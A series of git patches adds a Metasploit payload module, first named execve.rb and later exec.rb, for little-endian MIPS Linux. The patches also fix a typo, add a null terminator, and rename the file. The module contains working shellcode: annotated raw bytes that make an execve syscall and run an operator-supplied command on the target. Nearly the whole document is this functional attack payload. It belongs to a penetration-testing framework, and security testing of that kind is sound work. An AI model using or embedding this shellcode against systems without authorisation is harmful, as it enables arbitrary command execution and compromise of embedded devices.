From f39e784d1963e5d27fc8e221ed5345c59b0ab625 Mon Sep 17 00:00:00 2001 From: Michael Messner Date: Wed, 12 Mar 2014 21:08:40 +0100 Subject: [PATCH 1/4] mipsle execve payload --- .../payloads/singles/linux/mipsle/execve.rb | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 modules/payloads/singles/linux/mipsle/execve.rb diff --git a/modules/payloads/singles/linux/mipsle/execve.rb b/modules/payloads/singles/linux/mipsle/execve.rb new file mode 100644 index 0000000000..612d30955a --- /dev/null +++ b/modules/payloads/singles/linux/mipsle/execve.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux CMD Execve Payload', + 'Description' => %q{ + A very small shellcode for executing commands. + This module is sometimes helpfull for testing purposes. + }, + 'Author' => + [ + 'Michael Messner ', #metasploit payload + 'entropy@phiral.net' #original payload + ], + 'References' => ['URL', 'http://www.exploit-db.com/exploits/17940/'], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'Payload' => + { + 'Offsets' => {} , + 'Payload' => '' + }) + ) + register_options( + [ + OptString.new('CMD', [ true, "The command string to execute" ]), + ], self.class) + end + + # + # Returns the command string to use for execution + # + def command_string + return datastore['CMD'] || '' + end + + def generate + + shellcode = + "\x66\x06\x06\x24" + # li a2,1638 + "\xff\xff\xd0\x04" + # bltzal a2,4100b4 + "\xff\xff\x06\x28" + # slti a2,zero,-1 + "\xe0\xff\xbd\x27" + # addiu sp,sp,-32 + "\x01\x10\xe4\x27" + # addiu a0,ra,4097 + "\x1f\xf0\x84\x24" + # addiu a0,a0,-4065 + "\xe8\xff\xa4\xaf" + # sw a0,-24(sp) + "\xec\xff\xa0\xaf" + # sw zero,-20(sp) + "\xe8\xff\xa5\x27" + # addiu a1,sp,-24 + "\xab\x0f\x02\x24" + # li v0,4011 + "\x0c\x01\x01\x01" # + syscall 0x40404 + + # + # Constructs the payload + # + return super + shellcode + command_string + + end + +end From 8db5d854c28aa6899adb5d73d037ade36c8d77cd Mon Sep 17 00:00:00 2001 From: Michael Messner Date: Thu, 13 Mar 2014 18:38:27 +0100 Subject: [PATCH 2/4] typo, null terminator --- modules/payloads/singles/linux/mipsle/execve.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/linux/mipsle/execve.rb b/modules/payloads/singles/linux/mipsle/execve.rb index 612d30955a..def99ef80c 100644 --- a/modules/payloads/singles/linux/mipsle/execve.rb +++ b/modules/payloads/singles/linux/mipsle/execve.rb @@ -15,7 +15,7 @@ module Metasploit3 'Name' => 'Linux CMD Execve Payload', 'Description' => %q{ A very small shellcode for executing commands. - This module is sometimes helpfull for testing purposes. + This module is sometimes helpful for testing purposes. }, 'Author' => [ @@ -63,7 +63,7 @@ module Metasploit3 # # Constructs the payload # - return super + shellcode + command_string + return super + shellcode + command_string + "\x00" end From a9952fa2949009113e9edf6752728e4859a9b215 Mon Sep 17 00:00:00 2001 From: Michael Messner Date: Tue, 25 Mar 2014 09:11:16 +0100 Subject: [PATCH 3/4] change name and filename --- .../payloads/singles/linux/mipsle/execve.rb | 70 ------------------- 1 file changed, 70 deletions(-) delete mode 100644 modules/payloads/singles/linux/mipsle/execve.rb diff --git a/modules/payloads/singles/linux/mipsle/execve.rb b/modules/payloads/singles/linux/mipsle/execve.rb deleted file mode 100644 index def99ef80c..0000000000 --- a/modules/payloads/singles/linux/mipsle/execve.rb +++ /dev/null @@ -1,70 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -module Metasploit3 - - include Msf::Payload::Single - include Msf::Payload::Linux - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'Linux CMD Execve Payload', - 'Description' => %q{ - A very small shellcode for executing commands. - This module is sometimes helpful for testing purposes. - }, - 'Author' => - [ - 'Michael Messner ', #metasploit payload - 'entropy@phiral.net' #original payload - ], - 'References' => ['URL', 'http://www.exploit-db.com/exploits/17940/'], - 'License' => MSF_LICENSE, - 'Platform' => 'linux', - 'Arch' => ARCH_MIPSLE, - 'Payload' => - { - 'Offsets' => {} , - 'Payload' => '' - }) - ) - register_options( - [ - OptString.new('CMD', [ true, "The command string to execute" ]), - ], self.class) - end - - # - # Returns the command string to use for execution - # - def command_string - return datastore['CMD'] || '' - end - - def generate - - shellcode = - "\x66\x06\x06\x24" + # li a2,1638 - "\xff\xff\xd0\x04" + # bltzal a2,4100b4 - "\xff\xff\x06\x28" + # slti a2,zero,-1 - "\xe0\xff\xbd\x27" + # addiu sp,sp,-32 - "\x01\x10\xe4\x27" + # addiu a0,ra,4097 - "\x1f\xf0\x84\x24" + # addiu a0,a0,-4065 - "\xe8\xff\xa4\xaf" + # sw a0,-24(sp) - "\xec\xff\xa0\xaf" + # sw zero,-20(sp) - "\xe8\xff\xa5\x27" + # addiu a1,sp,-24 - "\xab\x0f\x02\x24" + # li v0,4011 - "\x0c\x01\x01\x01" # + syscall 0x40404 - - # - # Constructs the payload - # - return super + shellcode + command_string + "\x00" - - end - -end From 50efd0b5d05917d70a7db9e85cd46074ab7871be Mon Sep 17 00:00:00 2001 From: Michael Messner Date: Tue, 25 Mar 2014 09:13:04 +0100 Subject: [PATCH 4/4] change name and filename and file included --- modules/payloads/singles/linux/mipsle/exec.rb | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 modules/payloads/singles/linux/mipsle/exec.rb diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb new file mode 100644 index 0000000000..b77a0b0e6d --- /dev/null +++ b/modules/payloads/singles/linux/mipsle/exec.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux Execute Command', + 'Description' => %q{ + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes. + }, + 'Author' => + [ + 'Michael Messner ', #metasploit payload + 'entropy@phiral.net' #original payload + ], + 'References' => ['URL', 'http://www.exploit-db.com/exploits/17940/'], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'Payload' => + { + 'Offsets' => {} , + 'Payload' => '' + }) + ) + register_options( + [ + OptString.new('CMD', [ true, "The command string to execute" ]), + ], self.class) + end + + # + # Returns the command string to use for execution + # + def command_string + return datastore['CMD'] || '' + end + + def generate + + shellcode = + "\x66\x06\x06\x24" + # li a2,1638 + "\xff\xff\xd0\x04" + # bltzal a2,4100b4 + "\xff\xff\x06\x28" + # slti a2,zero,-1 + "\xe0\xff\xbd\x27" + # addiu sp,sp,-32 + "\x01\x10\xe4\x27" + # addiu a0,ra,4097 + "\x1f\xf0\x84\x24" + # addiu a0,a0,-4065 + "\xe8\xff\xa4\xaf" + # sw a0,-24(sp) + "\xec\xff\xa0\xaf" + # sw zero,-20(sp) + "\xe8\xff\xa5\x27" + # addiu a1,sp,-24 + "\xab\x0f\x02\x24" + # li v0,4011 + "\x0c\x01\x01\x01" # + syscall 0x40404 + + # + # Constructs the payload + # + return super + shellcode + command_string + "\x00" + + end + +end